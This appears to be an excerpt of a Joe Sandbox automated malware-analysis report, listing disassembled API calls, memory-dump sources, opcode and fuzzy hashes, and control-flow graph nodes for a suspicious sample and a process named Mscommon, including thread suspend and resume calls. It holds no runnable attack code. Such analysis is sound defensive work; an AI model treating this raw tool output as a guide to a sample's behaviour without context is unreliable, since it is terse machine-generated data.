                                                                                                                                      • Part of subcall function 00371FDD: _wcslen.LIBCMT ref: 00372006
                                                                                                                                      • Part of subcall function 00371FDD: _wcslen.LIBCMT ref: 00372014
                                                                                                                                      • Part of subcall function 00371FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0036B371,?,?,00000000,?,?,?), ref: 0037202F
                                                                                                                                      • Part of subcall function 0037AC04: SetCurrentDirectoryW.KERNELBASE(?,0037AE72,C:\Users\user\Desktop,00000000,003A946A,00000006), ref: 0037AC08
                                                                                                                                    • _wcslen.LIBCMT ref: 0037AE8B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$CompareCurrentDirectoryString
                                                                                                                                    • String ID: <7$C:\Users\user\Desktop
                                                                                                                                    • API String ID: 521417927-3960524650
                                                                                                                                    • Opcode ID: 314fe9394fb4a069537da710946ad18906f96c2d5e2db2fc6e110f3d1e847c5c
                                                                                                                                    • Instruction ID: 046537c110f44156d380ccd3cce8e4bcfa0ab97fb62549820d72bfa00a3f5065
                                                                                                                                    • Opcode Fuzzy Hash: 314fe9394fb4a069537da710946ad18906f96c2d5e2db2fc6e110f3d1e847c5c
                                                                                                                                    • Instruction Fuzzy Hash: 1E015271D00219A5DF23ABA4DD0AEDE72FCAF0D700F004456F609E7191E6B896448BA1
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 003897E5: GetLastError.KERNEL32(?,003A1030,00384674,003A1030,?,?,00383F73,00000050,?,003A1030,00000200), ref: 003897E9
                                                                                                                                      • Part of subcall function 003897E5: _free.LIBCMT ref: 0038981C
                                                                                                                                      • Part of subcall function 003897E5: SetLastError.KERNEL32(00000000,?,003A1030,00000200), ref: 0038985D
                                                                                                                                      • Part of subcall function 003897E5: _abort.LIBCMT ref: 00389863
                                                                                                                                    • _abort.LIBCMT ref: 0038BB80
                                                                                                                                    • _free.LIBCMT ref: 0038BBB4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast_abort_free
                                                                                                                                    • String ID: p9
                                                                                                                                    • API String ID: 289325740-1904256876
                                                                                                                                    • Opcode ID: e6f9a7039994d61314dabde3296f8e42647ef126814fc1634bb19c96b9ac2ebf
                                                                                                                                    • Instruction ID: 8af0abf776e1d9bcefee598523577d213c433a441a7aa2b484288e20b6476298
                                                                                                                                    • Opcode Fuzzy Hash: e6f9a7039994d61314dabde3296f8e42647ef126814fc1634bb19c96b9ac2ebf
                                                                                                                                    • Instruction Fuzzy Hash: 4C018071D01B22DBCB23FF69840162DF7A5BF04B20B1A019AE8646B295CB756D018FC1
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Malloc
                                                                                                                                    • String ID: (7$Z7
                                                                                                                                    • API String ID: 2696272793-1636684695
                                                                                                                                    • Opcode ID: 7993f3633ab03731d17ec0132c64a0c8d8142bacdc0f416e26aba7589ca57c8f
                                                                                                                                    • Instruction ID: 704c36b0d40ca1d23c087077411247891e9e9a0cb014fb91f80dfbf4061a1757
                                                                                                                                    • Opcode Fuzzy Hash: 7993f3633ab03731d17ec0132c64a0c8d8142bacdc0f416e26aba7589ca57c8f
                                                                                                                                    • Instruction Fuzzy Hash: 2801E4B6640119BF9F069FA1DD49CAEBBBDEF08344B108159B906D7120E631AA44DBA0
                                                                                                                                    APIs
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00371206,?), ref: 00370FEA
                                                                                                                                    • GetLastError.KERNEL32(?), ref: 00370FF6
                                                                                                                                      • Part of subcall function 00366C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00366C54
                                                                                                                                    Strings
                                                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00370FFF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                                                    • Opcode ID: c955fbf5bd6c98b7533f6f3d2c8dadb1f579c3bd7cb794d718937fe8a107bfcd
                                                                                                                                    • Instruction ID: c51c6b1530d51d359f0886f6d17d918585e578af6cb6d4f58353dcf3c2951199
                                                                                                                                    • Opcode Fuzzy Hash: c955fbf5bd6c98b7533f6f3d2c8dadb1f579c3bd7cb794d718937fe8a107bfcd
                                                                                                                                    • Instruction Fuzzy Hash: 0FD05B7650493076C62333386C47DAF3908DB52771F514715F139652E5CA154D915691
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,0036DA55,?), ref: 0036E2A3
                                                                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0036DA55,?), ref: 0036E2B1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FindHandleModuleResource
                                                                                                                                    • String ID: RTL
                                                                                                                                    • API String ID: 3537982541-834975271
                                                                                                                                    • Opcode ID: 23abb74c540e8fb215822df353a727a5742581abe4abbb156ac92823ea3c8a70
                                                                                                                                    • Instruction ID: 0faca84771c2bb662c496ba56b0ee9b9174fc53d9d0639cc596d1385e7458fc2
                                                                                                                                    • Opcode Fuzzy Hash: 23abb74c540e8fb215822df353a727a5742581abe4abbb156ac92823ea3c8a70
                                                                                                                                    • Instruction Fuzzy Hash: 1FC0807124071066EB3227747C0DF836E5C9B01B15F05044DF142E93D1D6E7C944C7E0
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E467
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: p7$z7
                                                                                                                                    • API String ID: 1269201914-1647427826
                                                                                                                                    • Opcode ID: a0722e21fa3892017704a3a83a622334591e04b59abdb66e2de60b594b5f99ae
                                                                                                                                    • Instruction ID: c94ea8b97e8df488469b5a13f293d2929d8f7977068e158cc949e9e28d8901bf
                                                                                                                                    • Opcode Fuzzy Hash: a0722e21fa3892017704a3a83a622334591e04b59abdb66e2de60b594b5f99ae
                                                                                                                                    • Instruction Fuzzy Hash: 17B012C62A9040BC3257A1151C02E37015CC0C8F50330D06EF83DC4481DC484C000533
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E467
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: U7$z7
                                                                                                                                    • API String ID: 1269201914-2516247399
                                                                                                                                    • Opcode ID: c8d23bc62ec54a5a05e37811d936ea38a8da06823c66d2359304b5a557e62184
                                                                                                                                    • Instruction ID: 574b132cf9873de47f0fc79d9deb62df0cf0af95fa764a257c2991338b786b76
                                                                                                                                    • Opcode Fuzzy Hash: c8d23bc62ec54a5a05e37811d936ea38a8da06823c66d2359304b5a557e62184
                                                                                                                                    • Instruction Fuzzy Hash: 22B012D62680007C321711111D02D37021CC0C4F10330D06EF639C4481DC4C0E010433

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:5.3%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:12
                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                    execution_graph 20853 7ffd9bc90a25 20854 7ffd9bc90a3f GetFileAttributesW 20853->20854 20856 7ffd9bc90b05 20854->20856 20857 7ffd9bc8ed69 20858 7ffd9bc8ed77 CloseHandle 20857->20858 20860 7ffd9bc8ee54 20858->20860 20861 7ffd9bc8d45d 20862 7ffd9bc8d46b SuspendThread 20861->20862 20864 7ffd9bc8d544 20862->20864 20865 7ffd9bc8ec04 20866 7ffd9bc8ec3b ResumeThread 20865->20866 20868 7ffd9bc8ed14 20866->20868
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: da5c11972d3ed0fef2075127aed808466d4a612123e6f5367ee6df31db03bdee
                                                                                                                                    • Instruction ID: 141a819d6b9e23bfebc08ada96c56d61a3bf5eb1bbcc64beb4915015e20268b4
                                                                                                                                    • Opcode Fuzzy Hash: da5c11972d3ed0fef2075127aed808466d4a612123e6f5367ee6df31db03bdee
                                                                                                                                    • Instruction Fuzzy Hash: 41A1C171A1994E8FE798DB68C8657A97FE1FF99314F4002BED048D72E6DB782805CB40

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2037550413.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9bc80000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                    • Opcode ID: 94c8c066af3295f2db81759df3e48e149b062c32c0f64438777c02e8baccbbc0
                                                                                                                                    • Instruction ID: e31391095d581884f49ce5e85ab2a36a328a90c0e7f65bca1d30b8a1312f77cc
                                                                                                                                    • Opcode Fuzzy Hash: 94c8c066af3295f2db81759df3e48e149b062c32c0f64438777c02e8baccbbc0
                                                                                                                                    • Instruction Fuzzy Hash: 2B516A70D0D78C8FDB99DFA8C894AEDBBF0EF56310F1441AAD049D7292DA389846CB11

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 11 7ffd9bc8d45d-7ffd9bc8d469 12 7ffd9bc8d46b-7ffd9bc8d473 11->12 13 7ffd9bc8d474-7ffd9bc8d542 SuspendThread 11->13 12->13 17 7ffd9bc8d54a-7ffd9bc8d594 13->17 18 7ffd9bc8d544 13->18 18->17
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2037550413.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9bc80000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: SuspendThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3178671153-0
                                                                                                                                    • Opcode ID: 20fb3771c60442fc6c91e942a4518c8004172f9d863479fcd05d5ae635577d39
                                                                                                                                    • Instruction ID: 52e74ac1512152fad7bb32573740560a505ef9e39675b018c0a6e452a69e41cf
                                                                                                                                    • Opcode Fuzzy Hash: 20fb3771c60442fc6c91e942a4518c8004172f9d863479fcd05d5ae635577d39
                                                                                                                                    • Instruction Fuzzy Hash: 62410C70E0864C8FDB58DFA8D895AADBBF0EB5A311F10416AD049D7252DA74A845CB41

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 21 7ffd9bc90a25-7ffd9bc90b03 GetFileAttributesW 25 7ffd9bc90b05 21->25 26 7ffd9bc90b0b-7ffd9bc90b49 21->26 25->26
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2037550413.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9bc80000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                    • Opcode ID: f371897d725672fc26ba4ad80343cfe66eb2ad8591ee8de315be78a6213738df
                                                                                                                                    • Instruction ID: 744b7a93244df3614f56c46ca79f89bbaef7e432fd47739c9744a4af6bef8bed
                                                                                                                                    • Opcode Fuzzy Hash: f371897d725672fc26ba4ad80343cfe66eb2ad8591ee8de315be78a6213738df
                                                                                                                                    • Instruction Fuzzy Hash: 0F41F870E08A5C8FDB98DFA8D895BEDBBF1FB59310F10416AD009E7252DA71A845CF41

                                                                                                                                    Control-flow Graph

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                    • Opcode ID: 6e57fbf5d1568e22fda11cc22fd1c02682233e94f3c0ca437f9d71e54440b111
                                                                                                                                    • Instruction ID: 98922c41c1ecadce090b157ed6de02d28e37f495bd8d6518e37b8ba16af5c0be
                                                                                                                                    • Opcode Fuzzy Hash: 6e57fbf5d1568e22fda11cc22fd1c02682233e94f3c0ca437f9d71e54440b111
                                                                                                                                    • Instruction Fuzzy Hash: E3517272E0854A9FDB69CB98C4615FDBBB1FF48340F1041BAD019E7286DA356A06CF44

                                                                                                                                    Control-flow Graph

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                    • Opcode ID: 209f604421599b58b9472fdb34c543dcf9e7382085640edfd06fd888915e6294
                                                                                                                                    • Instruction ID: 728fcc352e53dd3eeda62b0c2e6ec626c474658ec7699311b8395beba0d94e54
                                                                                                                                    • Opcode Fuzzy Hash: 209f604421599b58b9472fdb34c543dcf9e7382085640edfd06fd888915e6294
                                                                                                                                    • Instruction Fuzzy Hash: 89514A32E0864E8FDB69DB98C8655BDBBB1FF49340F1041BED01AE7296CA386901CB54

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 100 7ffd9bc8ed69-7ffd9bc8ed75 101 7ffd9bc8ed77-7ffd9bc8ed7a 100->101 102 7ffd9bc8ed80-7ffd9bc8ed89 100->102 103 7ffd9bc8ed7f 101->103 102->103 104 7ffd9bc8ed8b-7ffd9bc8ee52 CloseHandle 102->104 103->102 108 7ffd9bc8ee5a-7ffd9bc8eeae 104->108 109 7ffd9bc8ee54 104->109 109->108
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.2037550413.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9bc80000_Mscommon.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                    • Opcode ID: adca7f776c727148facf439f2e1e37cede8b5aa37c32c8c29543b8004a251d1f
                                                                                                                                    • Instruction ID: f16a42e1ada775cf11f1e592ea92f40bd22aa6f7ffb7621234c73670a2577b16
                                                                                                                                    • Opcode Fuzzy Hash: adca7f776c727148facf439f2e1e37cede8b5aa37c32c8c29543b8004a251d1f
                                                                                                                                    • Instruction Fuzzy Hash: EB417F70D0865D8FDB59DFA8D894BEDBBF0FF5A310F1041AAD049D7292DA34A885CB41

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 112 7ffd9c1b6cb0-7ffd9c1b6cca 113 7ffd9c1b72cc-7ffd9c1b72da 112->113 114 7ffd9c1b6cd0-7ffd9c1b6ce0 112->114 115 7ffd9c1b72dc 113->115 116 7ffd9c1b72e1-7ffd9c1b72f0 113->116 117 7ffd9c1b6ce6-7ffd9c1b6d21 114->117 118 7ffd9c1b732a-7ffd9c1b7340 114->118 115->116 121 7ffd9c1b6dba-7ffd9c1b6dc2 117->121 122 7ffd9c1b738a-7ffd9c1b739d 118->122 123 7ffd9c1b7342-7ffd9c1b7366 118->123 124 7ffd9c1b6dc8 121->124 125 7ffd9c1b6d26-7ffd9c1b6d2f 121->125 126 7ffd9c1b6dd2-7ffd9c1b6def 124->126 125->118 127 7ffd9c1b6d35-7ffd9c1b6d40 125->127 130 7ffd9c1b6df6-7ffd9c1b6e07 126->130 128 7ffd9c1b6d46-7ffd9c1b6d5a 127->128 129 7ffd9c1b6dca-7ffd9c1b6dce 127->129 131 7ffd9c1b6d5c-7ffd9c1b6d73 128->131 132 7ffd9c1b6db3-7ffd9c1b6db7 128->132 129->126 137 7ffd9c1b6e09-7ffd9c1b6e1e 130->137 138 7ffd9c1b6e20-7ffd9c1b6e2f 130->138 131->118 133 7ffd9c1b6d79-7ffd9c1b6d85 131->133 132->121 135 7ffd9c1b6d87-7ffd9c1b6d9b 133->135 136 7ffd9c1b6d9f-7ffd9c1b6db0 133->136 135->131 139 7ffd9c1b6d9d 135->139 136->132 137->138 142 7ffd9c1b6e51-7ffd9c1b6ebe 138->142 143 7ffd9c1b6e31-7ffd9c1b6e4c 138->143 139->132 152 7ffd9c1b6f0f-7ffd9c1b6f56 142->152 153 7ffd9c1b6ec0-7ffd9c1b6ed3 142->153 150 7ffd9c1b7289-7ffd9c1b72a9 143->150 157 7ffd9c1b72ad-7ffd9c1b72ba 150->157 163 7ffd9c1b6f5a-7ffd9c1b6f7b 152->163 153->118 156 7ffd9c1b6ed9-7ffd9c1b6f07 153->156 164 7ffd9c1b6f08-7ffd9c1b6f0d 156->164 158 7ffd9c1b72bc-7ffd9c1b72c6 157->158 158->114 161 7ffd9c1b72cb 158->161 161->113 167 7ffd9c1b6fec-7ffd9c1b6ffd 163->167 168 7ffd9c1b6f7d-7ffd9c1b6f81 163->168 164->153 165 7ffd9c1b6f0e 164->165 165->152 169 7ffd9c1b6ffe-7ffd9c1b7001 167->169 168->164 171 7ffd9c1b6f83 168->171 172 7ffd9c1b7007-7ffd9c1b700b 169->172 173 7ffd9c1b6fac-7ffd9c1b6fbd 171->173 174 7ffd9c1b700d-7ffd9c1b700f 172->174 173->172 178 7ffd9c1b6fbf-7ffd9c1b6fcd 173->178 176 7ffd9c1b7059-7ffd9c1b7061 174->176 177 7ffd9c1b7011-7ffd9c1b701f 174->177 179 7ffd9c1b70ab-7ffd9c1b70b3 176->179 180 7ffd9c1b7063-7ffd9c1b706c 176->180 181 7ffd9c1b7090-7ffd9c1b70a5 177->181 182 7ffd9c1b7021-7ffd9c1b7025 177->182 183 7ffd9c1b6fcf-7ffd9c1b6fd3 178->183 184 7ffd9c1b703e-7ffd9c1b7053 178->184 187 7ffd9c1b713b-7ffd9c1b7149 179->187 188 7ffd9c1b70b9-7ffd9c1b70d2 179->188 185 7ffd9c1b706f-7ffd9c1b7071 180->185 181->179 182->173 192 7ffd9c1b7027 182->192 183->163 200 7ffd9c1b6fd5 183->200 184->176 190 7ffd9c1b7073-7ffd9c1b7075 185->190 191 7ffd9c1b70e2-7ffd9c1b70e4 185->191 193 7ffd9c1b714b-7ffd9c1b714d 187->193 194 7ffd9c1b71ba-7ffd9c1b71bb 187->194 188->187 195 7ffd9c1b70d4-7ffd9c1b70d5 188->195 201 7ffd9c1b7077 190->201 202 7ffd9c1b70f1-7ffd9c1b70f5 190->202 207 7ffd9c1b70e5-7ffd9c1b70e7 191->207 192->184 196 7ffd9c1b71c9-7ffd9c1b71cb 193->196 197 7ffd9c1b714f 193->197 203 7ffd9c1b71eb-7ffd9c1b71ed 194->203 198 7ffd9c1b70d6-7ffd9c1b70e0 195->198 204 7ffd9c1b723c 196->204 205 7ffd9c1b71cd-7ffd9c1b71cf 196->205 197->198 206 7ffd9c1b7151 197->206 198->191 200->167 201->169 208 7ffd9c1b7079 201->208 209 7ffd9c1b70f7 202->209 210 7ffd9c1b7171-7ffd9c1b718b 202->210 211 7ffd9c1b71ef 203->211 212 7ffd9c1b725e-7ffd9c1b7287 203->212 204->157 220 7ffd9c1b723e-7ffd9c1b7240 204->220 213 7ffd9c1b724b-7ffd9c1b724f 